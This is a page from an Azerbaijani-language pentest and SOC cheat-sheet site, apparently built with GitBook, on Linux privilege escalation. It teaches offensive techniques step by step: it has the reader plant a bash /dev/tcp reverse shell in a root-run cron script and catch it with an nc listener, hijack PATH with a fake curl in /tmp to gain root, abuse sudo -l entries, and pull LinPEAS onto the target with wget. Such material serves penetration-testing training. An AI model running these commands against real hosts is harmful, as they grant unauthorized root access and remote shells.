Pentest və SOC Cheat Sheet
  • Reconnaissance
  • Post-Explotation
    • Linux Post-Explotation
      • Linux Local Enumeration
      • Linux Privilege Escalation
      • Dumping and cracking hashes on Linux
      • Linux Persistence
    • Windows Post-Explotation
      • Windows Local Enumeration
      • Windows Privilege Escalation
      • Windows Persistence
  • Network Services Pentesting
    • 21-Pentesting FTP
    • 22-Pentesting SSH
    • 23-Pentesting Telnet
    • 53-Pentesting DNS
    • 25,465,587-Pentesting SMTP
    • 110,995-Pentesting POP
    • 139,445-Pentesting SMB
    • 3306-Pentesting MySQL
    • 3389-Pentesting RDP
    • 1433-Pentesting MSSQL-Microsoft SQL Server
    • 389,636,3268,3269-Pentesting LDAP
  • Web Pentesting
    • Broken Access Control
      • Praktiki nümunə
    • OS Command Injection
      • Praktiki nümunə
    • SQL Injection
      • Praktiki nümunə
    • Cross-Site-Scripting (XSS)
      • Praktiki nümunə
    • File Upload
      • Praktiki nümunə
    • Directory Traversal və Path Traversal
      • Praktiki nümunə
    • CSRF
    • XXE
    • Clickjacking
      • Praktiki nümunə
    • SSRF
      • Praktiki nümunə
    • JWT (Json Web Token)
      • Praktiki nümunə
    • Local&Remote File İnclusion
      • Praktiki nümunə
      • Local File inclusion ilə reverse shell almaq
    • 401&403 Bypass
    • Login Bypass
    • Open Redirect
    • Unicode Injection
    • Security Misconfiguration
    • CRLF injection
    • LDAP Injection
    • Cookies Hacking
    • Cross site WebSocket hijacking (CSWSH)
    • SSTI (Server Side Template Injection)
    • CSTI (Client Side Template Injection)
    • XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)
    • Registration & Takeover Vulnerabilities
    • Regular expression Denial of Service - ReDoS
    • Reset/Forgotten Password Bypass
    • SAML Hücumları
    • Reverse Tab Nabbing
    • Web Tool - WFuzz
    • XPATH enjeksiyonu
    • Server-Side Includes (SSI) Injection
    • Edge Side Inclusion Injection (ESII)
    • Race Condition
    • PostMessage
    • Parameter Pollution
    • Cache Poisoning and Cache Deception
    • Captcha Bypass
  • AD Pentesting
    • Domain Enumeration
      • PowerView ilə enumeration
      • AD Module ilə enumeration
      • BloodHound ilə enumeration
        • On Site BloodHound
      • Using Adalanche
        • Remote adalanche
      • Useful Enumeration Tools
    • Local Privilege Escalation
      • Useful Local Priv Esc Tools
      • UAC Bypass
    • Lateral Movement
      • Powershell Remoting
      • Mimikatz
      • Remote Desktop Protocol
      • URL File Attacks
      • Useful Tools
    • Domain Privilege Escalation
      • Kerberoast
      • ASREPRoast
      • Password Spray Attack
      • Force Set SPN
      • Abusing Shadow Copies
      • List and Decrypt Stored Credentials using Mimikatz
      • Unconstrained Delegation
      • Constrained Delegation
      • Resource Based Constrained Delegation
      • DNSAdmins Abuse
      • Abusing Active Directory-Integraded DNS (ADIDNS) poisoning
      • Abusing Backup Operators Group
      • SID History Abuse
      • Active Directory Certificate Services
    • Domain Persistence
      • Golden Ticket Attack
      • Silver Ticket Attack
      • Skeleton Key Attack
      • DSRM Abuse
      • DCsync Attack
    • Cross Forest Attacks
      • Trust Tickets
      • Abuse MSSQL Servers
      • Breaking Forest Trusts
  • SOC - Cheat Sheet
    • SOC Nədir?
    • SOC Komponentləri Nələrdir?
    • SOC Checklist
    • SIEM
      • Splunk Qurulması və Konfiqurasiyası
    • IDS/IPS
    • Firewall
    • Firewall qurulması və konfiqurasiyası
    • EDR/XDR
    • SOAR
    • Windows Commands for SOC analysts
      • GUI Programs in Windows
      • Event Viewer
      • Task Scheduler
      • Group Policy Editor
      • Device Manager
      • Task Manager
      • Registry Manager
    • Linux Commands for SOC analysts
    • LOLBAS Apps and Commands
      • Apps and Commands
Powered by GitBook
On this page
  • Privilege Escalation nədir?
  • Cron Jobs privilege escalation
  • PATH privilege escalation
  • sudo -l
  • SUİD icazəli faylar ilə privilege escalation

Was this helpful?

  1. Post-Explotation
  2. Linux Post-Explotation

Linux Privilege Escalation

Privilege Escalation nədir?

"privilege escalation" kompüter təhlükəsizliyi və sistem idarəçiliyi terminidir. Bu termin ümumiyyətlə zərərli istifadəçi və ya proqramın mövcud imtiyazlarını artırmaqla sistemə daha yüksək səviyyəli giriş əldə etməsi prosesinə aiddir. Bu o deməkdir ki, adətən məhdud giriş icazələri olan istifadəçi və ya proqram daha yüksək icazələrə malik istifadəçi və ya sistem səviyyəsinə daxil ola bilər.

2 növü var:

  • Vertical Privilege Escalation

"Vertical Privilege Escalation" istifadəçinin cari icazə səviyyəsini artırmaqla daha yüksək imtiyaz əldə etməyə cəhd etməsidir.

  • Horizontal Privilege Escalation

"Horizontal Privilege Escalation" istifadəçi və ya tətbiqin eyni imtiyaz səviyyəsinə malik başqa istifadəçi və ya proqramın icazələrini əldə etməyə cəhd etməsidir. Bu, adətən, eyni səviyyədə digər hesabları oğurlamaq və ya istifadə etmək məqsədi daşıyır.

Privilege Escalation üçün bir çox metotdan istifadə olunur:

Cron Jobs privilege escalation

Cron Jobs nədir?

Cron (daemon/service) müəyyən vaxtda və ya hərəkətdə avtomatik icra etmək üçün planlaşdırılmış binary/scriptdən istifadə edir.Varsayılan olaraq onalar sahiblərinin imtiyazları ilə çalışır.Cron konfuqriyasıyalarının tarixləri corntablarda qeyd olunur onları oxumaq üçün “cat /etc/crontab”

əmrindən istifafə edilir.Sistemdəki hər bir istifadəçinin öz crontab faylı var və daxil olub-olmamasından asılı olmayaraq xüsusi tapşırıqları yerinə yetirə bilər.

Cron Jobs metodologiyası sadədir

1.Aktiv tapşırıqları müəyənləşdiririk

2.root imtiyazları və ya hər hansı digər istifadəçi ilə işləyən planlaşdırılmış tapşırıq olub olmadığını yoxlayın.

3.Çalışılacaq skripti dəyişdirin; bu iş sahibi imtiyazlarını əldə edin.

Praktiki

1./etc/crontap baxıb orda intervalı ən qısa olanı işi secirik və kim tərfindən icara olunduquna diqqət yertirməliyik root tərəfindən icra olunan iş secilməlidi.

Bunlardan hər hansı birini kontentini deyişib icərisinə reverse shell qoya bilərik və ya silib eyni ad ile yeni bir fayl yaradıb icine reverse shell qoya bilerik.

bash -i >& /dev/tcp/<IP>/<Port>0>&1
#Ip hissəsinə  nc ilə dinləmə acdiqimiz cihazın ip yazırıq porta isə dinlədiyimiz portu yazırıq

sonra isə öz cihazimizda nc ilə dinləmə aciriq.

nc -lnvp <port>

PATH privilege escalation

PATH nədir?

PATH, Kali Linux-dakı proqramların yerləşdiyi qovluqları göstərən bir mühit dəyişənidir. Komanda sətiri vasitəsilə işlətmək istədiyiniz proqramların yerləşdiyi qovluqları PATH daxilindəki təyin edilmiş yerləşmələrdə axtarır. Məsələn, bir komandanı işə saldığınız zaman, sistem bu komandanın harada olduğunu PATH daxilində göstərilən qovluqlarda axtarır axtarır. Beləliklə, hər hansı bir qovluqda yerləşən proqramları bir başa komanda sətrində işə sala bilərsiniz.

echo $PATH    # bu əmr ilə PARH da yazılan qovluqları görə bilərik

PATH ilə necə privilege escalation edə bilərik?

sistemə daxil olduqdan sonra find əmri ilə yardımıyla SUID veya 4000 icazəsinə sahib olnan fayları axtarırıq.

find / -perm -u=s -exec ls -l {} \\; 2>/dev/null

Yukarıdaki əmri çalıştırdıktan sonra /usr/bin/menu'nun SUID icazələrə sahip olduğunu və normalda

linux da belə bir şey olmur.Yerləşdiyi qovluqa gedib oxumaqa calışaq görəriki binary da yazılıb buna görə strings əmrindən istifadə edib oxuyuruq.Bu əmr yalnız oxuna bilən hissələri göstərir.

Göründüyü kimi bu SUİD curl əmrindən istifadə edin və biz /tmp faylda curl adın bir bədniyətli fayl yarada biləra və aşağıdakı əmr ilə /tmp-ni PATH əlavə edə bilrəik.

echo /bin/bash > curl    # curl faylinin icinə /bin/bash yazır
chmod 777 curl           # curl faylına bütün içazələri verir 
export PATH=/tmp:$PATH   # tmp PATH əlavə edir

PATH yenə oxusaq görərik ki tmp ora əlavə olunub.

/usr/bin/menu yenidən calışdırdıqda onun icərisində curl işlədən zaman birinci /tmp icinə baxır

ona görədə bizim yaradıqımız curl istifadə edir və beləliklə biz root olduq.

sudo -l

sudo -l əmri mövcud userın root kimi runlaya biləcəyi fayları göstərir.Bu əmrin verdiyi nəticə

/etc/sudoers faylında yazılır və edit etmək üçün visudo əmrində istifadə olunur.

sudo -l əmrində göstərilən faylı icərisinə reverse shell qoyub runladıqda root kimi runladıqı üçün

dinləmə acdıqımızda root-un shellini alırıq.

SUİD icazəli faylar ilə privilege escalation

SUİD icazəli faylar ilə privilege escalation

SUİD nədir?

SUID, Unix əməliyyat sistemi içində bir faylın sahibinin yetkiləri ilə faylın işləməsini təmin edən bir funksiya olaraq qeydə alınır. Bu, normal istifadəçinin edə bilməyəcəyi xüsusi əməliyyatları icra etmək üçün imkan yaradır, lakin düzgün istifadə olunmaması təhlükəli ola bilər və təhlükəsizlik açar.

SUİD faylarını tapmaq üçün bu əmrdən istifadə olnur.

find / -perm -4000 -type f 2>/dev/null

Necə privilege escalation edə bilərik?

  • LinPEAS

linPEAS sistemi enumeration edir və Privileges etmənin yolarını göstərir.

linPEAS kali linuxun özündə olur.Tapmaq üçün bu əmri istifadə edin:

find / 2>/dev/null |grep linpeas.sh

Sistemə daxil olduqdan sonra oranı linpeas ile enumeration etmək üçün birinci o sistemə linpeası yükləməliyik.Öz sisteminizdə linpeas olan yerde python server qaldırırıq.

python -m http.server 8080

Bu əmr 8080 portu üzərində http serveri qaldırır.

Sonra isə bu server vasitəsi ile linpeasi digər sistemə yükləməliyik.

Bunun üçün /tmp qovluquna aşaqıdakı əmri calışdırırıq./tmp getmə səbəbi ora aşaqı dərəcəli user belə fayl runlama icazəsi var.

wget http://<İP>:8080/linpeas.sh
#ip yerinə pyton server qaldırdiqimiz cihazın ip yazırıq

Yükləndikdən sonra chmod ilə linpeas icazələr veririk.

chmod +x linpeas.sh:

Bunları etdikdən sonra linpeas işə salmaq qalır.Onun üçün bu əmri yazırıq:

./linpeas.sh

Nəticə olaraq linpeas sistemi enumeration edir və imtiyaz yüksəldə biləcəyımız şeyləri göstərir.

sarı/qırmızı olanlar 95% ehdimala privilege escalation edə bimək olur.

qırmızı olanlanlarda diqqət yetirməyə dəyər.

PreviousLinux Local EnumerationNextDumping and cracking hashes on Linux

Last updated 1 year ago

Was this helpful?

Beləliklər faylı müəyən iterval ərzində özünü runladıqı üçün biz dinləmə acıb reverse shell ala bilidik və root olduq.

SUID-ləri tapdıqdan sonra saytında axtarıb privilige etmək üçün yararlı olub olmadıqını ,yararlıdısada necə privilige edə biləcəyini göstərir

bachup.sh
GTFOBins